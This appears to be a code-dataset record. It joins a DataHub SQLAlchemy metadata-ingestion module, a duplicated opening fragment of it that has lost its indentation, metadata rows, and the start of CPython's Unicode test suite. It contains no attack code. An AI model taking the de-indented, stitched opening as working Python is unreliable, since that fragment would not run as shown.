if not sql_config.table_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
columns = inspector.get_columns(table, schema)
if len(columns) == 0:
self.report.report_warning(dataset_name, "missing column information")
try:
# SQLALchemy stubs are incomplete and missing this method.
# PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
table_info: dict = inspector.get_table_comment(table, schema) # type: ignore
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = table_info["text"]
# The "properties" field is a non-standard addition to SQLAlchemy's interface.
properties = table_info.get("properties", {})
# TODO: capture inspector.get_pk_constraint
# TODO: capture inspector.get_sorted_table_and_fkc_names
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
)
dataset_snapshot.aspects.append(dataset_properties)
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def loop_views(
self,
inspector: Inspector,
schema: str,
sql_config: SQLAlchemyConfig,
) -> Iterable[SqlWorkUnit]:
for view in inspector.get_view_names(schema):
schema, view = sql_config.standardize_schema_table_names(schema, view)
dataset_name = sql_config.get_identifier(schema, view)
self.report.report_entity_scanned(dataset_name, ent_type="view")
if not sql_config.view_pattern.allowed(dataset_name):
self.report.report_dropped(dataset_name)
continue
try:
columns = inspector.get_columns(view, schema)
except KeyError:
# For certain types of views, we are unable to fetch the list of columns.
self.report.report_warning(
dataset_name, "unable to get schema for this view"
)
schema_metadata = None
else:
schema_metadata = get_schema_metadata(
self.report, dataset_name, self.platform, columns
)
try:
# SQLALchemy stubs are incomplete and missing this method.
# PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
view_info: dict = inspector.get_table_comment(view, schema) # type: ignore
except NotImplementedError:
description: Optional[str] = None
properties: Dict[str, str] = {}
else:
description = view_info["text"]
# The "properties" field is a non-standard addition to SQLAlchemy's interface.
properties = view_info.get("properties", {})
try:
view_definition = inspector.get_view_definition(view, schema)
if view_definition is None:
view_definition = ""
else:
# Some dialects return a TextClause instead of a raw string,
# so we need to convert them to a string.
view_definition = str(view_definition)
except NotImplementedError:
view_definition = ""
properties["view_definition"] = view_definition
properties["is_view"] = "True"
dataset_snapshot = DatasetSnapshot(
urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
aspects=[],
)
if description is not None or properties:
dataset_properties = DatasetPropertiesClass(
description=description,
customProperties=properties,
# uri=dataset_name,
)
dataset_snapshot.aspects.append(dataset_properties)
if schema_metadata:
dataset_snapshot.aspects.append(schema_metadata)
mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
wu = SqlWorkUnit(id=dataset_name, mce=mce)
self.report.report_workunit(wu)
yield wu
def get_report(self):
return self.report
def close(self):
pass
| 35.757143
| 118
| 0.639433
|
import logging
from abc import abstractmethod
from dataclasses import dataclass, field
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Type
from urllib.parse import quote_plus
import pydantic
from sqlalchemy import create_engine, inspect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql import sqltypes as types
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mce_builder import DEFAULT_ENV
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import DatasetSnapshot
from datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent
from datahub.metadata.com.linkedin.pegasus2avro.schema import (
ArrayTypeClass,
BooleanTypeClass,
BytesTypeClass,
DateTypeClass,
EnumTypeClass,
MySqlDDL,
NullTypeClass,
NumberTypeClass,
RecordTypeClass,
SchemaField,
SchemaFieldDataType,
SchemaMetadata,
StringTypeClass,
TimeTypeClass,
)
from datahub.metadata.schema_classes import DatasetPropertiesClass
logger: logging.Logger = logging.getLogger(__name__)
def make_sqlalchemy_uri(
    scheme: str,
    username: Optional[str],
    password: Optional[str],
    at: Optional[str],
    db: Optional[str],
    uri_opts: Optional[Dict[str, Any]] = None,
) -> str:
    """Assemble a SQLAlchemy connection URI from its individual components.

    Username and password are percent-encoded; empty-valued options are
    dropped from the query string.
    """
    pieces = [f"{scheme}://"]
    if username is not None:
        pieces.append(quote_plus(username))
        if password is not None:
            pieces.append(f":{quote_plus(password)}")
        # The "@" separator is only emitted when credentials are present.
        pieces.append("@")
    if at is not None:
        pieces.append(at)
    if db is not None:
        pieces.append(f"/{db}")
    url = "".join(pieces)
    if uri_opts is not None:
        if db is None:
            url += "/"
        params = "&".join(
            f"{key}={quote_plus(value)}" for (key, value) in uri_opts.items() if value
        )
        url = f"{url}?{params}"
    return url
@dataclass
class SQLSourceReport(SourceReport):
    """Ingestion report tracking scanned and filtered SQL entities."""
    tables_scanned: int = 0
    views_scanned: int = 0
    filtered: List[str] = field(default_factory=list)
    def report_entity_scanned(self, name: str, ent_type: str = "table") -> None:
        """Count one scanned entity of the given type ("table" or "view")."""
        if ent_type == "view":
            self.views_scanned += 1
        elif ent_type == "table":
            self.tables_scanned += 1
        else:
            raise KeyError(f"Unknown entity {ent_type}.")
    def report_dropped(self, ent_name: str) -> None:
        """Record an entity that was excluded by an allow/deny pattern."""
        self.filtered.append(ent_name)
class SQLAlchemyConfig(ConfigModel):
    """Base configuration shared by every SQLAlchemy-backed source."""
    env: str = DEFAULT_ENV
    # Extra keyword arguments forwarded to sqlalchemy.create_engine().
    options: dict = {}
    # Allow/deny filters applied to schema, table, and view identifiers.
    schema_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    table_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    view_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
    include_views: Optional[bool] = True
    include_tables: Optional[bool] = True
    @abstractmethod
    def get_sql_alchemy_url(self):
        """Return the SQLAlchemy connection URL; must be implemented by subclasses."""
        pass
    def get_identifier(self, schema: str, table: str) -> str:
        """Default dataset identifier: '<schema>.<table>'."""
        return f"{schema}.{table}"
    def standardize_schema_table_names(
        self, schema: str, entity: str
    ) -> Tuple[str, str]:
        """Hook for dialects that need to normalize schema/entity names; identity by default."""
        return schema, entity
class BasicSQLAlchemyConfig(SQLAlchemyConfig):
    """Config for sources that connect with scheme/host/credentials."""
    username: Optional[str] = None
    # SecretStr keeps the password masked in logs and reprs.
    password: Optional[pydantic.SecretStr] = None
    host_port: str
    database: Optional[str] = None
    database_alias: Optional[str] = None
    scheme: str
    def get_sql_alchemy_url(self, uri_opts=None):
        """Build the connection URL from the configured credentials."""
        return make_sqlalchemy_uri(
            self.scheme,
            self.username,
            self.password.get_secret_value() if self.password else None,
            self.host_port,
            self.database,
            uri_opts=uri_opts,
        )
@dataclass
class SqlWorkUnit(MetadataWorkUnit):
    """Work unit emitted by SQL sources; adds nothing beyond MetadataWorkUnit."""
    pass
# Mapping from SQLAlchemy column types to schema field type classes.
# Order matters: get_column_type uses the first isinstance match.
_field_type_mapping: Dict[Type[types.TypeEngine], Type] = {
    types.Integer: NumberTypeClass,
    types.Numeric: NumberTypeClass,
    types.Boolean: BooleanTypeClass,
    types.Enum: EnumTypeClass,
    types._Binary: BytesTypeClass,
    types.LargeBinary: BytesTypeClass,
    types.PickleType: BytesTypeClass,
    types.ARRAY: ArrayTypeClass,
    types.String: StringTypeClass,
    types.Date: DateTypeClass,
    types.DATE: DateTypeClass,
    types.Time: TimeTypeClass,
    types.DateTime: TimeTypeClass,
    types.DATETIME: TimeTypeClass,
    types.TIMESTAMP: TimeTypeClass,
    types.JSON: RecordTypeClass,
    types.NullType: NullTypeClass,
}
# Types we recognize but intentionally map to NullTypeClass without warning.
_known_unknown_field_types: Set[Type[types.TypeEngine]] = {
    types.Interval,
    types.CLOB,
}
def register_custom_type(
    tp: Type[types.TypeEngine], output: Optional[Type] = None
) -> None:
    """Register a custom SQLAlchemy type, optionally mapping it to a schema type.

    Without *output*, the type is treated as known-but-unmappable (null type).
    """
    if not output:
        _known_unknown_field_types.add(tp)
    else:
        _field_type_mapping[tp] = output
class _CustomSQLAlchemyDummyType(types.TypeDecorator):
    # Placeholder base for dynamically created dummy types; the backing
    # implementation is irrelevant since these types are never executed.
    impl = types.LargeBinary
def make_sqlalchemy_type(name: str) -> Type[types.TypeEngine]:
    """Dynamically create a dummy SQLAlchemy type class with the given name.

    Bug fix: the result of type() was previously bound to a misspelled local
    ("qlalchemy_type") while "sqlalchemy_type" was returned, raising a
    NameError on every call.
    """
    # This usage of type() dynamically constructs a class.
    # See https://stackoverflow.com/a/15247202/5004662 and
    # https://docs.python.org/3/library/functions.html#type.
    sqlalchemy_type: Type[types.TypeEngine] = type(
        name,
        (_CustomSQLAlchemyDummyType,),
        {
            "__repr__": lambda self: f"{name}()",
        },
    )
    return sqlalchemy_type
def get_column_type(
    sql_report: SQLSourceReport, dataset_name: str, column_type: Any
) -> SchemaFieldDataType:
    """Map a SQLAlchemy column type to a schema field type, warning on unknowns."""
    # First isinstance match wins, so the mapping's insertion order matters.
    type_class: Optional[Type] = next(
        (
            mapped
            for sa_type, mapped in _field_type_mapping.items()
            if isinstance(column_type, sa_type)
        ),
        None,
    )
    if type_class is None:
        if any(
            isinstance(column_type, sa_type) for sa_type in _known_unknown_field_types
        ):
            # Known-but-unmappable types become the null type silently.
            type_class = NullTypeClass
        else:
            sql_report.report_warning(
                dataset_name, f"unable to map type {column_type!r} to metadata schema"
            )
            type_class = NullTypeClass
    return SchemaFieldDataType(type=type_class())
def get_schema_metadata(
    sql_report: SQLSourceReport, dataset_name: str, platform: str, columns: List[dict]
) -> SchemaMetadata:
    """Convert SQLAlchemy column dicts into a SchemaMetadata aspect."""
    def _to_field(col: dict) -> SchemaField:
        # repr() of the type is the fallback when the dialect gives no full_type.
        return SchemaField(
            fieldPath=col["name"],
            type=get_column_type(sql_report, dataset_name, col["type"]),
            nativeDataType=col.get("full_type", repr(col["type"])),
            description=col.get("comment", None),
            nullable=col["nullable"],
            recursive=False,
        )
    return SchemaMetadata(
        schemaName=dataset_name,
        platform=f"urn:li:dataPlatform:{platform}",
        version=0,
        hash="",
        platformSchema=MySqlDDL(tableSchema=""),
        fields=[_to_field(col) for col in columns],
    )
class SQLAlchemySource(Source):
    """A base class for all SQL sources that use SQLAlchemy to extend."""
    def __init__(self, config: SQLAlchemyConfig, ctx: PipelineContext, platform: str):
        super().__init__(ctx)
        self.config = config
        self.platform = platform
        self.report = SQLSourceReport()
    def get_inspectors(self) -> Iterable[Inspector]:
        """Yield one SQLAlchemy inspector per database to scan.

        Can be overridden to run dynamically against multiple databases.
        """
        url = self.config.get_sql_alchemy_url()
        logger.debug(f"sql_alchemy_url={url}")
        engine = create_engine(url, **self.config.options)
        inspector = inspect(engine)
        yield inspector
    def get_workunits(self) -> Iterable[SqlWorkUnit]:
        """Generate a work unit for every allowed table/view in every allowed schema."""
        sql_config = self.config
        if logger.isEnabledFor(logging.DEBUG):
            # Echo each issued SQL query when debug logging is enabled.
            sql_config.options["echo"] = True
        for inspector in self.get_inspectors():
            for schema in inspector.get_schema_names():
                if not sql_config.schema_pattern.allowed(schema):
                    self.report.report_dropped(f"{schema}.*")
                    continue
                if sql_config.include_tables:
                    yield from self.loop_tables(inspector, schema, sql_config)
                if sql_config.include_views:
                    yield from self.loop_views(inspector, schema, sql_config)
    def loop_tables(
        self,
        inspector: Inspector,
        schema: str,
        sql_config: SQLAlchemyConfig,
    ) -> Iterable[SqlWorkUnit]:
        """Yield a SqlWorkUnit per table in *schema* that passes table_pattern."""
        for table in inspector.get_table_names(schema):
            schema, table = sql_config.standardize_schema_table_names(schema, table)
            dataset_name = sql_config.get_identifier(schema, table)
            # Counted as scanned before pattern filtering, so the report
            # reflects everything that was seen.
            self.report.report_entity_scanned(dataset_name, ent_type="table")
            if not sql_config.table_pattern.allowed(dataset_name):
                self.report.report_dropped(dataset_name)
                continue
            columns = inspector.get_columns(table, schema)
            if len(columns) == 0:
                self.report.report_warning(dataset_name, "missing column information")
            try:
                # get_table_comment is missing from the SQLAlchemy stubs.
                table_info: dict = inspector.get_table_comment(table, schema)  # type: ignore
            except NotImplementedError:
                # Not every dialect supports table comments.
                description: Optional[str] = None
                properties: Dict[str, str] = {}
            else:
                description = table_info["text"]
                # "properties" is a non-standard addition to SQLAlchemy's interface.
                properties = table_info.get("properties", {})
            # TODO: capture inspector.get_pk_constraint
            # TODO: capture inspector.get_sorted_table_and_fkc_names
            dataset_snapshot = DatasetSnapshot(
                urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
                aspects=[],
            )
            if description is not None or properties:
                dataset_properties = DatasetPropertiesClass(
                    description=description,
                    customProperties=properties,
                )
                dataset_snapshot.aspects.append(dataset_properties)
            schema_metadata = get_schema_metadata(
                self.report, dataset_name, self.platform, columns
            )
            dataset_snapshot.aspects.append(schema_metadata)
            mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
            wu = SqlWorkUnit(id=dataset_name, mce=mce)
            # Report before yielding so the report stays accurate even if the
            # consumer stops iterating early.
            self.report.report_workunit(wu)
            yield wu
    def loop_views(
        self,
        inspector: Inspector,
        schema: str,
        sql_config: SQLAlchemyConfig,
    ) -> Iterable[SqlWorkUnit]:
        """Yield a SqlWorkUnit per view in *schema* that passes view_pattern."""
        for view in inspector.get_view_names(schema):
            schema, view = sql_config.standardize_schema_table_names(schema, view)
            dataset_name = sql_config.get_identifier(schema, view)
            self.report.report_entity_scanned(dataset_name, ent_type="view")
            if not sql_config.view_pattern.allowed(dataset_name):
                self.report.report_dropped(dataset_name)
                continue
            try:
                columns = inspector.get_columns(view, schema)
            except KeyError:
                # For certain types of views, we are unable to fetch the list of columns.
                self.report.report_warning(
                    dataset_name, "unable to get schema for this view"
                )
                schema_metadata = None
            else:
                schema_metadata = get_schema_metadata(
                    self.report, dataset_name, self.platform, columns
                )
            try:
                # SQLALchemy stubs are incomplete and missing this method.
                # PR: https://github.com/dropbox/sqlalchemy-stubs/pull/223.
                view_info: dict = inspector.get_table_comment(view, schema)  # type: ignore
            except NotImplementedError:
                # Not every dialect supports view comments.
                description: Optional[str] = None
                properties: Dict[str, str] = {}
            else:
                description = view_info["text"]
                # The "properties" field is a non-standard addition to SQLAlchemy's interface.
                properties = view_info.get("properties", {})
            try:
                view_definition = inspector.get_view_definition(view, schema)
                if view_definition is None:
                    view_definition = ""
                else:
                    # Some dialects return a TextClause instead of a raw string.
                    view_definition = str(view_definition)
            except NotImplementedError:
                view_definition = ""
            properties["view_definition"] = view_definition
            properties["is_view"] = "True"
            dataset_snapshot = DatasetSnapshot(
                urn=f"urn:li:dataset:(urn:li:dataPlatform:{self.platform},{dataset_name},{self.config.env})",
                aspects=[],
            )
            if description is not None or properties:
                dataset_properties = DatasetPropertiesClass(
                    description=description,
                    customProperties=properties,
                )
                dataset_snapshot.aspects.append(dataset_properties)
            if schema_metadata:
                dataset_snapshot.aspects.append(schema_metadata)
            mce = MetadataChangeEvent(proposedSnapshot=dataset_snapshot)
            wu = SqlWorkUnit(id=dataset_name, mce=mce)
            self.report.report_workunit(wu)
            yield wu
    def get_report(self):
        """Return the accumulated SQLSourceReport."""
        return self.report
    def close(self):
        # No persistent resources to release.
        pass
| true
| true
|
f70504c11afdc0157e75d2a01ec110e01f694f06
| 132,215
|
py
|
Python
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 7
|
2018-04-12T17:11:04.000Z
|
2021-12-02T14:01:47.000Z
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 1
|
2021-12-01T08:11:51.000Z
|
2021-12-01T08:11:51.000Z
|
Lib/test/test_unicode.py
|
KinkowanWinter/Transcendental-Number-Utilization
|
5f6d1d32850ad2cd2d03cc6f796d32ba7876fc39
|
[
"PSF-2.0"
] | 4
|
2018-04-27T18:03:08.000Z
|
2020-04-12T23:14:29.000Z
|
""" Test script for the Unicode implementation.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import _string
import codecs
import itertools
import operator
import struct
import string
import sys
import unittest
import warnings
from test import support, string_tests
# Error handling (bad decoder return)
def search_function(encoding):
    """Codec search hook returning deliberately malformed codec tuples.

    "test.unicode1" codecs return a non-tuple (42); "test.unicode2" codecs
    return a tuple without str/bytes ((42, 42)).  Other encodings are not
    handled.  Used to exercise codec error handling.
    """
    def bad_encode_scalar(input, errors="strict"):
        return 42  # not a tuple
    def bad_decode_scalar(input, errors="strict"):
        return 42  # not a tuple
    def bad_encode_pair(input, errors="strict"):
        return (42, 42)  # no unicode
    def bad_decode_pair(input, errors="strict"):
        return (42, 42)  # no unicode
    if encoding == "test.unicode1":
        return (bad_encode_scalar, bad_decode_scalar, None, None)
    if encoding == "test.unicode2":
        return (bad_encode_pair, bad_decode_pair, None, None)
    return None
codecs.register(search_function)
def duplicate_string(text):
    """
    Try to get a fresh clone of the specified text:
    new object with a reference count of 1.

    This is a best-effort: latin1 single letters and the empty
    string ('') are singletons and cannot be cloned.
    """
    # Round-tripping through UTF-8 forces allocation of a new str object.
    encoded = text.encode()
    return encoded.decode()
class StrSubclass(str):
    # Minimal str subclass used by tests that check which type str methods
    # return and how subclasses interact with identity-based fast paths.
    pass
class UnicodeTest(string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
unittest.TestCase):
type2test = str
def checkequalnofix(self, result, object, methodname, *args):
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(type(realresult) is type(result))
# if the original is returned make sure that
# this doesn't happen with subclasses
if realresult is object:
class usub(str):
def __repr__(self):
return 'usub(%r)' % str.__repr__(self)
object = usub(object)
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assertTrue(object is not realresult)
def test_literals(self):
self.assertEqual('\xff', '\u00ff')
self.assertEqual('\uffff', '\U0000ffff')
self.assertRaises(SyntaxError, eval, '\'\\Ufffffffe\'')
self.assertRaises(SyntaxError, eval, '\'\\Uffffffff\'')
self.assertRaises(SyntaxError, eval, '\'\\U%08x\'' % 0x110000)
# raw strings should not have unicode escapes
self.assertNotEqual(r"\u0020", " ")
    def test_ascii(self):
        """ascii() escaping: basics, the full latin-1 range (every non-ASCII
        byte escaped), wide escapes, and rejection of bytes from __repr__."""
        if not sys.platform.startswith('java'):
            # Test basic sanity of repr()
            self.assertEqual(ascii('abc'), "'abc'")
            self.assertEqual(ascii('ab\\c'), "'ab\\\\c'")
            self.assertEqual(ascii('ab\\'), "'ab\\\\'")
            self.assertEqual(ascii('\\c'), "'\\\\c'")
            self.assertEqual(ascii('\\'), "'\\\\'")
            self.assertEqual(ascii('\n'), "'\\n'")
            self.assertEqual(ascii('\r'), "'\\r'")
            self.assertEqual(ascii('\t'), "'\\t'")
            self.assertEqual(ascii('\b'), "'\\x08'")
            self.assertEqual(ascii("'\""), """'\\'"'""")
            self.assertEqual(ascii("'\""), """'\\'"'""")
            self.assertEqual(ascii("'"), '''"'"''')
            self.assertEqual(ascii('"'), """'"'""")
            # Expected ascii() of ''.join(map(chr, range(256))): every
            # non-printable/non-ASCII character is hex-escaped.
            latin1repr = (
                "'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
                "\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
                "\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
                "JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
                "\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
                "\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
                "\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
                "\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
                "\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
                "\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
                "\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
                "\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
                "\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
                "\\xfe\\xff'")
            testrepr = ascii(''.join(map(chr, range(256))))
            self.assertEqual(testrepr, latin1repr)
            # Test ascii works on wide unicode escapes without overflow.
            self.assertEqual(ascii("\U00010000" * 39 + "\uffff" * 4096),
                             ascii("\U00010000" * 39 + "\uffff" * 4096))
        class WrongRepr:
            def __repr__(self):
                return b'byte-repr'
        self.assertRaises(TypeError, ascii, WrongRepr())
    def test_repr(self):
        """repr() escaping.  Unlike ascii(), repr() leaves *printable*
        latin-1 characters unescaped, so the expected string below mixes
        escape text (\\x..) for non-printables with raw \\x.. source escapes
        (the characters themselves) for printables — note \\xa0 (NBSP) and
        \\xad (soft hyphen) remain escaped because they are not printable."""
        if not sys.platform.startswith('java'):
            # Test basic sanity of repr()
            self.assertEqual(repr('abc'), "'abc'")
            self.assertEqual(repr('ab\\c'), "'ab\\\\c'")
            self.assertEqual(repr('ab\\'), "'ab\\\\'")
            self.assertEqual(repr('\\c'), "'\\\\c'")
            self.assertEqual(repr('\\'), "'\\\\'")
            self.assertEqual(repr('\n'), "'\\n'")
            self.assertEqual(repr('\r'), "'\\r'")
            self.assertEqual(repr('\t'), "'\\t'")
            self.assertEqual(repr('\b'), "'\\x08'")
            self.assertEqual(repr("'\""), """'\\'"'""")
            self.assertEqual(repr("'\""), """'\\'"'""")
            self.assertEqual(repr("'"), '''"'"''')
            self.assertEqual(repr('"'), """'"'""")
            latin1repr = (
                "'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
                "\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
                "\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
                "JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
                "\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
                "\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
                "\\x9c\\x9d\\x9e\\x9f\\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9"
                "\xaa\xab\xac\\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
                "\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
                "\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3"
                "\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
                "\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
                "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd"
                "\xfe\xff'")
            testrepr = repr(''.join(map(chr, range(256))))
            self.assertEqual(testrepr, latin1repr)
            # Test repr works on wide unicode escapes without overflow.
            self.assertEqual(repr("\U00010000" * 39 + "\uffff" * 4096),
                             repr("\U00010000" * 39 + "\uffff" * 4096))
        class WrongRepr:
            def __repr__(self):
                return b'byte-repr'
        self.assertRaises(TypeError, repr, WrongRepr())
def test_iterators(self):
# Make sure unicode objects have an __iter__ method
it = "\u1111\u2222\u3333".__iter__()
self.assertEqual(next(it), "\u1111")
self.assertEqual(next(it), "\u2222")
self.assertEqual(next(it), "\u3333")
self.assertRaises(StopIteration, next, it)
    def test_count(self):
        """str.count: common tests, negative slice bounds, and matches across
        1-, 2-, and 4-byte string representations (mixed kinds)."""
        string_tests.CommonTest.test_count(self)
        # check mixed argument types
        self.checkequalnofix(3, 'aaa', 'count', 'a')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(3, 'aaa', 'count', 'a')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(0, 'aaa', 'count', 'b')
        self.checkequalnofix(1, 'aaa', 'count', 'a', -1)
        self.checkequalnofix(3, 'aaa', 'count', 'a', -10)
        self.checkequalnofix(2, 'aaa', 'count', 'a', 0, -1)
        self.checkequalnofix(0, 'aaa', 'count', 'a', 0, -10)
        # test mixed kinds
        self.checkequal(10, '\u0102' + 'a' * 10, 'count', 'a')
        self.checkequal(10, '\U00100304' + 'a' * 10, 'count', 'a')
        self.checkequal(10, '\U00100304' + '\u0102' * 10, 'count', '\u0102')
        self.checkequal(0, 'a' * 10, 'count', '\u0102')
        self.checkequal(0, 'a' * 10, 'count', '\U00100304')
        self.checkequal(0, '\u0102' * 10, 'count', '\U00100304')
        self.checkequal(10, '\u0102' + 'a_' * 10, 'count', 'a_')
        self.checkequal(10, '\U00100304' + 'a_' * 10, 'count', 'a_')
        self.checkequal(10, '\U00100304' + '\u0102_' * 10, 'count', '\u0102_')
        self.checkequal(0, 'a' * 10, 'count', 'a\u0102')
        self.checkequal(0, 'a' * 10, 'count', 'a\U00100304')
        self.checkequal(0, '\u0102' * 10, 'count', '\u0102\U00100304')
    def test_find(self):
        """str.find: the memchr fast path, argument-type errors, and searches
        across mixed 1-, 2-, and 4-byte string kinds."""
        string_tests.CommonTest.test_find(self)
        # test implementation details of the memchr fast path
        self.checkequal(100, 'a' * 100 + '\u0102', 'find', '\u0102')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0201')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0120')
        self.checkequal(-1, 'a' * 100 + '\u0102', 'find', '\u0220')
        self.checkequal(100, 'a' * 100 + '\U00100304', 'find', '\U00100304')
        self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00100204')
        self.checkequal(-1, 'a' * 100 + '\U00100304', 'find', '\U00102004')
        # check mixed argument types
        self.checkequalnofix(0, 'abcdefghiabc', 'find', 'abc')
        self.checkequalnofix(9, 'abcdefghiabc', 'find', 'abc', 1)
        self.checkequalnofix(-1, 'abcdefghiabc', 'find', 'def', 4)
        self.assertRaises(TypeError, 'hello'.find)
        self.assertRaises(TypeError, 'hello'.find, 42)
        # test mixed kinds
        self.checkequal(100, '\u0102' * 100 + 'a', 'find', 'a')
        self.checkequal(100, '\U00100304' * 100 + 'a', 'find', 'a')
        self.checkequal(100, '\U00100304' * 100 + '\u0102', 'find', '\u0102')
        self.checkequal(-1, 'a' * 100, 'find', '\u0102')
        self.checkequal(-1, 'a' * 100, 'find', '\U00100304')
        self.checkequal(-1, '\u0102' * 100, 'find', '\U00100304')
        self.checkequal(100, '\u0102' * 100 + 'a_', 'find', 'a_')
        self.checkequal(100, '\U00100304' * 100 + 'a_', 'find', 'a_')
        self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'find', '\u0102_')
        self.checkequal(-1, 'a' * 100, 'find', 'a\u0102')
        self.checkequal(-1, 'a' * 100, 'find', 'a\U00100304')
        self.checkequal(-1, '\u0102' * 100, 'find', '\u0102\U00100304')
    def test_rfind(self):
        """str.rfind: the memrchr fast path and searches across mixed kinds."""
        string_tests.CommonTest.test_rfind(self)
        # test implementation details of the memrchr fast path
        self.checkequal(0, '\u0102' + 'a' * 100 , 'rfind', '\u0102')
        self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0201')
        self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0120')
        self.checkequal(-1, '\u0102' + 'a' * 100 , 'rfind', '\u0220')
        self.checkequal(0, '\U00100304' + 'a' * 100, 'rfind', '\U00100304')
        self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00100204')
        self.checkequal(-1, '\U00100304' + 'a' * 100, 'rfind', '\U00102004')
        # check mixed argument types
        self.checkequalnofix(9, 'abcdefghiabc', 'rfind', 'abc')
        self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
        self.checkequalnofix(12, 'abcdefghiabc', 'rfind', '')
        # test mixed kinds
        self.checkequal(0, 'a' + '\u0102' * 100, 'rfind', 'a')
        self.checkequal(0, 'a' + '\U00100304' * 100, 'rfind', 'a')
